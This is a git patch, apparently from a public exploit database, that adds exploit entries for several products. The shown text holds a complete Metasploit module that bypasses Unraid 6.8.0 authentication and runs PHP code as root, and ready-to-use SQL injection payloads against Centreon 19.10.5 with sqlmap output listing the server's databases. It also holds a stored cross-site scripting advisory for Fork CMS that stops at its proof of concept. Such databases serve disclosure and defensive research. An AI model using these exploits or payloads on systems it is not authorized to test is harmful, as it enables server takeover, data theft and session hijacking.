From 01900f216d27957107cc84a3fcbd5f5a6a28b735 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 21 Apr 2020 05:01:47 +0000 Subject: [PATCH] DB: 2020-04-21 7 changes to exploits/shellcodes Atomic Alarm Clock 6.3 - Stack Overflow (Unicode+SEH) Nsauditor 3.2.1.0 - Buffer Overflow (SEH+ASLR bypass (3 bytes overwrite)) Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH) Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit) Centreon 19.10.5 - 'id' SQL Injection Fork CMS 5.8.0 - Persistent Cross-Site Scripting --- exploits/linux/remote/48353.rb | 101 +++++++ exploits/php/webapps/48345.txt | 69 +++++ exploits/php/webapps/48348.txt | 491 +++++++++++++++++++++++++++++++ exploits/windows/local/48346.py | 97 ++++++ exploits/windows/local/48350.py | 108 +++++++ exploits/windows/local/48351.py | 54 ++++ exploits/windows/local/48352.txt | 28 ++ files_exploits.csv | 7 + 8 files changed, 955 insertions(+) create mode 100755 exploits/linux/remote/48353.rb create mode 100644 exploits/php/webapps/48345.txt create mode 100644 exploits/php/webapps/48348.txt create mode 100755 exploits/windows/local/48346.py create mode 100755 exploits/windows/local/48350.py create mode 100755 exploits/windows/local/48351.py create mode 100644 exploits/windows/local/48352.txt diff --git a/exploits/linux/remote/48353.rb b/exploits/linux/remote/48353.rb new file mode 100755 index 000000000..55f048b35 --- /dev/null +++ b/exploits/linux/remote/48353.rb @@ -0,0 +1,101 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::PhpEXE + + Rank = ExcellentRanking + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Unraid 6.8.0 Auth Bypass PHP Code Execution', + 'Description' => %q{ + This module exploits two vulnerabilities affecting Unraid 6.8.0. + An authentication bypass is used to gain access to the administrative + interface, and an insecure use of the extract PHP function can be abused + for arbitrary code execution as root. + }, + 'Author' => + [ + 'Nicolas CHATELAIN ' + ], + 'References' => + [ + [ 'CVE', '2020-5847' ], + [ 'CVE', '2020-5849' ], + [ 'URL', 'https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/' ], + [ 'URL', 'https://forums.unraid.net/topic/88253-critical-security-vulnerabilies-discovered/' ] + ], + 'License' => MSF_LICENSE, + 'Platform' => ['php'], + 'Privileged' => true, + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'Automatic', {}] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 10 2020' + ) + ) + + register_options( + [ + OptString.new('TARGETURI', [ true, 'The URI of the Unraid application', '/']) + ] + ) + end + + def check + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'), + 'method' => 'GET' + ) + + unless res + return CheckCode::Unknown('Connection failed') + end + + unless res.code == 200 + return CheckCode::Safe('Unexpected reply') + end + + /\sVersion:\s(?[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2}) / =~ res.body + + if version && Gem::Version.new(version) == Gem::Version.new('6.8.0') + return CheckCode::Appears("Unraid version #{version} appears to be vulnerable") + end + + CheckCode::Safe + end + + def exploit + begin + vprint_status('Sending exploit code') + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'), + 'method' => 'GET', + 'encode_params' => false, + 'vars_get' => + { + 'path' => 'x', + 'site[x][text]' => Rex::Text.uri_encode("", 'hex-normal') + } + ) + + if res.nil? + print_good('Request timed out, OK if running a non-forking/blocking payload...') + elsif res.code == 302 + fail_with(Failure::NotVulnerable, 'Redirected, target is not vulnerable.') + else + print_warning("Unexpected response code #{res.code}, please check your payload.") + end + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + end + end +end \ No newline at end of file diff --git a/exploits/php/webapps/48345.txt b/exploits/php/webapps/48345.txt new file mode 100644 index 000000000..6a9c7ba07 --- /dev/null +++ b/exploits/php/webapps/48345.txt @@ -0,0 +1,69 @@ +# Exploit Title: Centreon 19.10.5 - 'id' SQL Injection +# Date: 2020-04-19 +# Exploit Author: Basim alabdullah +# Vendor Homepage: https://www.centreon.com +# Software Link: https://download.centreon.com/ +# Version: v.19.10.5 +# Tested on: Centos 5 + + +[EXECUTIVE SUMMARY] + + Centreon has come a long way from its early roots. A user-friendly monitoring console on Nagios before, Centreon is today, a rich monitoring platform powered by Centreon Engine, Centreon Broker and Centreon Web. + + Monitoring-savvy IT practitioners who want Nagios-inspired flexibility without its complexity, easily embrace Centreon for robust infrastructure systems and network performance monitoring. + Downloaded by hundreds and thousands of IT professionals worldwide. + The analysis discovered a time-based blind SQL + injection vulnerability in the tracker functionality of + Centreon Monitoring software. A malicious user can inject arbitrary + SQL commands to the application. The vulnerability lies in the project tracker + service search functionality; depending on project visibility successful + exploitation may require user authentication. A successful attack + can read, modify or delete data from the database or execute arbitrary commands on the underlying system. + +[VULNERABLE VERSIONS] + + The following version of the Centreon Monitoring was affected by the + vulnerability; previous versions may be vulnerable as well: + - Centreon version 19.10.5 + + +[Proof of Concept] + + http://TARGET/centreon/include/monitoring/acknowlegement/xml/broker/makeXMLForAck.php?hid=15&svc_id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7176706b71%2C%28CASE%20WHEN%20%28ISNULL%28JSON_STORAGE_FREE%28NULL%29%29%29%20THEN%201%20ELSE%200%20END%29%2C0x716b716b71%29%2CNULL%2CNULL%23 + + + [Payloads] + + Parameter: svc_id (GET) + Type: boolean-based blind + Title: OR boolean-based blind - WHERE or HAVING clause (NOT) + Payload: hid=15&svc_id=1 OR NOT 5782=5782 + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: hid=15&svc_id=1 AND (SELECT 1615 FROM (SELECT(SLEEP(5)))TRPy) + + Type: UNION query + Title: MySQL UNION query (NULL) - 5 columns + Payload: hid=15&svc_id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7176706b71,0x724b66756a476759544f48716d61496b5a68754a4c6f42634e6e775272724c44616e567355527a6f,0x716b716b71),NULL,NULL# +--- +[12:24:35] [INFO] testing MySQL +[12:24:35] [INFO] confirming MySQL +[12:24:35] [INFO] the back-end DBMS is MySQL +[12:24:35] [INFO] fetching banner +web server operating system: Linux Red Hat +web application technology: Apache 2.4.34, PHP 7.2.24 +back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) +banner: '10.1.38-MariaDB' +[12:24:35] [INFO] fetching database names +[12:24:35] [INFO] starting 4 threads +[12:24:35] [INFO] resumed: 'centreon' +[12:24:35] [INFO] resumed: 'test' +[12:24:35] [INFO] resumed: 'centreon_storage' +[12:24:35] [INFO] resumed: 'information_schema' +available databases [4]: +[*] centreon +[*] centreon_storage +[*] information_schema +[*] test \ No newline at end of file diff --git a/exploits/php/webapps/48348.txt b/exploits/php/webapps/48348.txt new file mode 100644 index 000000000..64d991ee6 --- /dev/null +++ b/exploits/php/webapps/48348.txt @@ -0,0 +1,491 @@ +# Title: Fork CMS 5.8.0 - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Vendor: https://www.fork-cms.com/download +# Software Link: https://github.com/forkcms/forkcms/pull/3073 +# CVE: N/A + +Document Title: +=============== +Fork CMS v5.8.0 - Multiple Persistent Web Vulnerbilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2208 + +ID (3073): https://github.com/forkcms/forkcms/pull/3073 + + +Release Date: +============= +2020-04-17 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2208 + + +Common Vulnerability Scoring System: +==================================== +5.3 + + +Vulnerability Class: +==================== +Cross Site Scripting - Persistent + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +Fork is an easy to use open source CMS using Symfony Components. Fork +CMS is dedicated to creating a user friendly environment +to build, monitor and +update your website. We take great pride in being the Content Management +System of choice for beginners and professionals. + +(Copy of the Homepage: https://www.fork-cms.com & +https://www.fork-cms.com/download ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple +persistent web vulnerabilities in the official Fork CMS v5.8.0. + + +Affected Product(s): +==================== +ForkCMS +Product: Fork CMS v5.8.0 - Content Management System (Web-Application) + + +Vulnerability Disclosure Timeline: +================================== +2020-04-17: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +Restricted authentication (user/moderator) - User privileges + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +Multiple persistent input validation web vulnerabilities has been +discovered in the official Fork CMS v5.8.0 open-source web-application. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise browser to +web-application requests from the application-side. + +The persistent input validation web vulnerabilities are located in the +`Displayname` input field when using the `Add`, `Edit` or `Register` +mechanism that forwards the information into the `var` parameter. Remote +attackers and privileged application user accounts are able to +inject own malicious persistent script code as the users displayname by +usage of the registration module (/profiles/register). Privileged +users with access to the profile or users module are able to exploit the +issue by a simple inject. The displayname then becomes visible in +the Admin - Profiles Index on Preview, Edit User/Profile, Delete User +Interaction and User Index in Listing modules. the var parameter +does not encode or parse the exisiting injected content and executes it. +The request method to inject is POST and the attack vector of the +vulnerability is located on the application-side of the content +management system. The injection point is located in the registration form +and the add/edit user function. The execution point of the issue occurs +in the preview profile, edit user, user index listing and delete +user message context. + +Successful exploitation of the vulnerabilities results in session +hijacking, persistent phishing attacks, persistent external redirects to +malicious source and persistent manipulation of affected application +modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] Register +[+] Add User +[+] Edit User + +Vulnerable Input(s): +[+] Displayname + +Vulnerable Parameter(s): +[+] var + +Affected Module(s): +[+] Preview Profile +[+] Edit User +[+] User Index +[+] Delete User + + +Proof of Concept (PoC): +======================= +The persistent input validation web vulnerabilities can be exploited by +remote attackers with low privileged user account and low user interaction. +For security demonstration or to reproduce the security vulnerability +follow the provided information an steüs below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Open the fork cms web-application newst version +2. Move via sitemap or by link to the registration page +(/modules/profiles/register) +3. Inject your script code payload html/js to the Displayname input field +4. Register the account by pushing submit +5. Activate the link in the account registration email +Note: Now simple wait until the administrator / privileged user visits +the panel to execute the code on interaction or preview only +6. Successful reproduce of the persistent script code injection +vulnerability! + + +PoC: Vulnerable Source (User Index in Listing - +https://fork-cms.localhost:8080/private/en/users/index) + +test3">